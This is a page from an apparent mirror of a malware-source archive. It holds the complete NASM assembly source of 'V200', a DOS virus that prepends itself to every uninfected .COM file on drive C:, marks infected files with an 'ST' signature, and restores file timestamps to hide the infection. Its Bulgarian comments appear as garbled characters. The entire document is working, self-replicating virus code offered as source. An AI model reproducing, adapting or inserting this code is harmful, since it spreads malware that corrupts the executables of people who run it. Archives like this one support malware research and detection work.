mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
4b9382ddbc
push
178 lines
6.5 KiB
NASM
178 lines
6.5 KiB
NASM
;------------------------------------------------------------------------------;
|
||
; ;
|
||
; ‚¨°³± V200 ;
|
||
; ;
|
||
; V200 ¥ ¯ ° §¨²¥ ¢¨°³±, ¤¥©±²¢¨¥²® ¬³ ±¥ ±º±²®© ¢ ±«¥¤®²® - ¯°¨ ±² °²¨° ¥;
|
||
; § ° §¥ ´ ©« ¢¨°³±º² ¯°¥²º°±¢ ¶¿« ² ²¥ª³¹ ¤¨°¥ª²®°¨¿ ¨ § ° §¿¢ ¢±¨·ª¨ ;
|
||
; COM - ´ ©«®¢¥,¢ ±«³· ©,·¥ ¢ ±¨±²¥¬ ² ¨¬ ³±²°®©±²¢® C: ²¥§¨ ¤¥©±²¢¨¿ ±¥ ;
|
||
; ¨§¯º«¿¢ ² ¢ ¥£®¢ ² ²¥ª³¹ ¤¨°¥ª²®°¨¿. ;
|
||
; V200 ±¥ ±² ¿¢ ¯°¥¤¨ ª®¤ § ° §¥¨¿ ´ ©«, ¢¨°³±º² ®°£ ¨§¨° ;
|
||
; ±®¡±²¢¥ ¯°®¶¥¤³° § ®¡° ¡®²ª ª°¨²¨·¨ £°¥¸ª¨ (¢¥ª²®° 24h) ¨ ¥ ¯°®¬¥¿;
|
||
; ¤ ² ² ¨ · ± § °¿§ ¨²¥ ´ ©«®¢¥. ;
|
||
; ;
|
||
;------------------------------------------------------------------------------;
|
||
|
||
.model Tiny
|
||
.code
|
||
|
||
|
||
VirLen = 200
|
||
NewId = offset Mark - 100h
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
ORG 0D0h
|
||
|
||
INT24 dw ? ; ’³ª ¹¥ ¡º¤¥ ±®·¥ ¢¥ª²®° 24h.
|
||
INT24a db ?
|
||
|
||
NewDTA db 15h dup (?) ; ‘²°³ª²³° DTA.
|
||
FAttr db ?
|
||
FTime dw ?
|
||
FDate dw ?
|
||
FLen dw ?, ?
|
||
FName db 0Dh dup (?)
|
||
|
||
;-----------------------------------------------------------------------------;
|
||
|
||
ORG 100h
|
||
|
||
Start:
|
||
push ax
|
||
|
||
mov INT24,3B0h ; <20>®¢ ¢¥ª²®° 24h : mov al,03
|
||
mov INT24a,0CFh ; iret
|
||
|
||
mov ax,2524h
|
||
mov dx,offset INT24
|
||
int 21h ; <20>°¥ ±®·¢ ¢¥ª²®° 24h.
|
||
|
||
mov ah,19h
|
||
int 21h ; ˆ±ª ®² „Ž‘ ²¥ª³¹®²® ³±²°®©±²¢®.
|
||
push ax ; ‡ ¯ §¢ ²¥ª³¹®²® ³±²°®©±²¢®.
|
||
|
||
|
||
mov ah,0Eh
|
||
mov dl,02h
|
||
int 21h ; ‘¬¥¿ ²¥ª³¹®²® ³±²°®©±²¢® C:
|
||
|
||
mov ax,cs
|
||
add ah,10h
|
||
mov es,ax ; ES = CS + 64KBytes
|
||
mov si,offset Start
|
||
xor di,di
|
||
mov cx,VirLen ; <20>°¥µ¢º°«¿ ª®¤ ¢¨°³± 64KBytes
|
||
rep movsb ; ¯®- £®°¥ ¢ ¯ ¬¥²² .
|
||
|
||
mov dx,offset NewDTA ; <20>®±² ¢¿ DTA ®¢ ¤°¥±.
|
||
mov ah,1Ah
|
||
int 21h
|
||
|
||
|
||
;...... ‡ ¯®·¢ ²º°±¥¥ ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||
|
||
mov dx, offset AllCom ; ’º°±¨ ¢±¨·ª¨ '*.COM' ´ ©«®¢¥.
|
||
mov cl,110B
|
||
mov ah,4Eh ; ˆ§¢¨ª¢ Find First.
|
||
int 21h
|
||
jc Done ; <20>°®¤º«¦ ¢ ² ²ºª ¯°¨ «¨¯±
|
||
; ´ ©«®¢¥ § § ° §¿¢ ¥.
|
||
FindNext:
|
||
|
||
mov dx,offset Fname ; ‚ dx ¤°¥± ¨¬¥²® ´ ©« ®² DTA.
|
||
mov ax,3D02h ; Ž²¢ °¿ ´ ©« § § ¯¨±/·¥²¥¥.
|
||
int 21h
|
||
|
||
mov bx,ax ; ‡ ¯ §¢ ®¬¥° ®²¢®°¥¨¿ ´ ©«.
|
||
|
||
push ds ; ‡ ¯ §¢ DS.
|
||
|
||
push es
|
||
pop ds ; <20>°®·¨² ±¥ ¶¥«¨¿ ´ ©« ¤°¥± -DS:DX
|
||
mov dx,VirLen ; DS = CS + 64KBytes
|
||
mov cx,0FFFFh ; DX = ¤º«¦¨ ² ¢¨°³±
|
||
mov ah,3Fh ; ’ ¬ ±¥ ¬¨° ¢¨°³± , ±¥£ ±«¥¤ ¥£®
|
||
int 21h ; ¨ ´ ©«º².
|
||
|
||
add ax,VirLen ; “¢¥«¨· ¢ ¤º«¦¨ ² ´ ©« (AX) ±
|
||
mov si,ax ; ¤º«¦¨ ² ¢¨°³± ¨ ¿ § ¯ §¢ ¢ SI.
|
||
|
||
cmp Word ptr ds:[NewId+VirLen],'TS' ; „ «¨ ´ ©«º² ¥ § ° §¥ ¢¥·¥ ?
|
||
je Close
|
||
|
||
xor cx,cx
|
||
xor dx,dx
|
||
mov ax,4200h ; <20>°¥¬¥±²¢ ±¥ ³ª § ²¥«¿ ´ ©« ¢
|
||
int 21h ; · «®²® ¬³.
|
||
|
||
mov cx,si
|
||
mov ah,40h ; Ž² ¤°¥± DS:DX ±¥ § ¯¨±¢ ¤¨±ª
|
||
int 21h ; ¢¨°³± + ´ ©«
|
||
|
||
mov cx,cs:FTime
|
||
mov dx,cs:FDate
|
||
mov ax,5701h ; ‚º§±² ®¢¿¢ ² ±¥ ¤ ² ² ¨ ¢°¥¬¥²®
|
||
int 21h ; § ° §¿¢ ¨¿ ´ ©« ®² DTA.
|
||
|
||
Close:
|
||
pop ds ; ‚º§±² ®¢¿¢ DS.
|
||
|
||
mov ah,3Eh ; ‡ ²¢ °¿ ´ ©« .
|
||
int 21h
|
||
|
||
mov ah,4Fh
|
||
int 21h ; ˆ§¢¨ª¢ Find Next,
|
||
jnc FindNext ; ª® ¨¬ ®¹¥ ´ ©«®¢¥ ¢±¨·ª® ±¥ ¯®¢² °¿
|
||
; ¨ § ²¿µ.
|
||
Done:
|
||
mov dx,80h
|
||
mov ah,1Ah
|
||
int 21h ; ‚º§±² ®¢¿¢ ±¥ ±² °¨¿ ¤°¥± DTA.
|
||
|
||
pop dx
|
||
mov ah,0Eh
|
||
int 21h ; ‚º§±² ®¢¿¢ ±¥ ²¥ª³¹¨¿ § ¢ °¥ ¤¨±ª.
|
||
|
||
;....... <20> · «® ±² °²¨° ¥ ¯°®£° ¬ ² ªº¬ ª®¿²® ¥ § ª ·¥ ¢¨°³± .
|
||
|
||
mov si,offset TransF
|
||
mov cx,offset EndCode - offset Transf
|
||
xor di,di ; Š®¯¨° 64KBytes ¯®- £®°¥ ¥¤
|
||
rep movsb ; ±¯®¬ £ ²¥« · ±², ¨§¯®«§¢ ¯®-¤®«³.
|
||
|
||
pop bx ; ‚º§±² ®¢¿¢ ±º¤º°¦ ¨¥²® AX ¢ BX.
|
||
|
||
push es
|
||
push cx
|
||
RETF ; Ž²¨¢ ¤°¥± ES:00
|
||
|
||
;.......................................
|
||
; Œ °ª¨°®¢ª § ° §¯®§ ¢ ¥ § ° §¥¨
|
||
Mark DB 'STSV' ; ´ ©«®¢¥.
|
||
AllCom db '*.COM',0 ; Œ ±ª § ²º°±¥¥ ¢±¨·ª¨ ´ ©«®¢¥
|
||
;.......................................; § § ° §¿¢ ¥.
|
||
|
||
TRansF:
|
||
push ds
|
||
pop es
|
||
|
||
mov si,offset EndCode
|
||
mov di,offset Start
|
||
dec cx
|
||
sub cx,si ; ‘¬ºª¢ ª®¤ ¯°®£° ¬ ² § ¯®·¢ ¹
|
||
rep movsb ; ¥¯®±°¥¤±²¢¥® ±«¥¤ ¢¨°³± ± 100h ¡ ©²
|
||
; ¤®«³.
|
||
push ds
|
||
mov ax,100h
|
||
push ax
|
||
|
||
mov ax,bx ; ‚º§±² ®¢¿¢ ±º¤º°¦ ¨¥²® AX.
|
||
|
||
RETF ; <20>°¥¤ ¢ ³¯° ¢«¥¨¥²® ¯°®£° ¬ ²
|
||
; ¤°¥± DS:100h.
|
||
;-----------------------------------------------------------------------------;
|
||
EndCode:
|
||
int 20h ; Ž² ²³ª § ¯®·¢ § ° §¥ ² ¯°®£° ¬
|
||
|
||
End Start
|
||
|